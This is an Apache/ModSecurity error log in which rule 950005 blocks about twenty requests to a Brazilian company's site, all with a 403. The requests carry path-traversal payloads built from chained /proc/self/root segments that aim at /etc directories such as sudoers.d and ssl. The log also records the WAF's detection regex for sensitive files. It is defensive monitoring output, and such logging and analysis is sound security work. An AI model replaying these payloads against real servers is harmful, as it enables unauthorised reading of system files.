[Mon Mar 16 17:37:14.654527 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:38434] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp-v9ocpUE4ed4uDwMDAAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:15.942070 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.241.46:38450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp-6QpVkWug9HeOt9NpAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:17.159113 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:38456] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp_c_BxrYCr4hPDw8DMwAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:18.466392 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:55034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp_qQpVkWug9HeOt9NpQAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:19.663855 2026] [:error] [pid 15568:tid 140411565680384] [client 74.7.241.46:55036] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhp_6QpVkWug9HeOt9NpgAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:20.985668 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:55040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqAM_BxrYCr4hPDw8DNQAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:22.534925 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:55052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqArysWC90G-1nBrBdpwAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:25.007193 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.241.46:55060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqA0r9dMAiw-8KANNicgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:26.347561 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:55068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqBrysWC90G-1nBrBdqQAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:27.535434 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:55074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqB9SswJuvopo3lOh3wgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:30.959946 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:57844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqCv9ocpUE4ed4uDwMFAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:34.450602 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:57856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqDaTCbgAP5jq5TehE-wAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:36.817788 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:57864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqEI6lpbStxTqkSkuDNQAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:38.092328 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:47264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqErABkC4fWIHEf8EOUQAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:41.527544 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:47274] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqFbABkC4fWIHEf8EOVQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:42.818635 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:47290] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqFtSswJuvopo3lOh3ywAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:47.593661 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:36482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqG46lpbStxTqkSkuDQAAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Mon Mar 16 17:37:49.058106 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:47302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqHf9ocpUE4ed4uDwMHQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:52.655381 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:57226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqIKTCbgAP5jq5TehFAQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:37:57.258843 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:57230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqJc_BxrYCr4hPDw8DTwAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:38:00.822811 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:48600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqKI6lpbStxTqkSkuDSgAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:38:05.534410 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:48608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqLaTCbgAP5jq5TehFBQAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
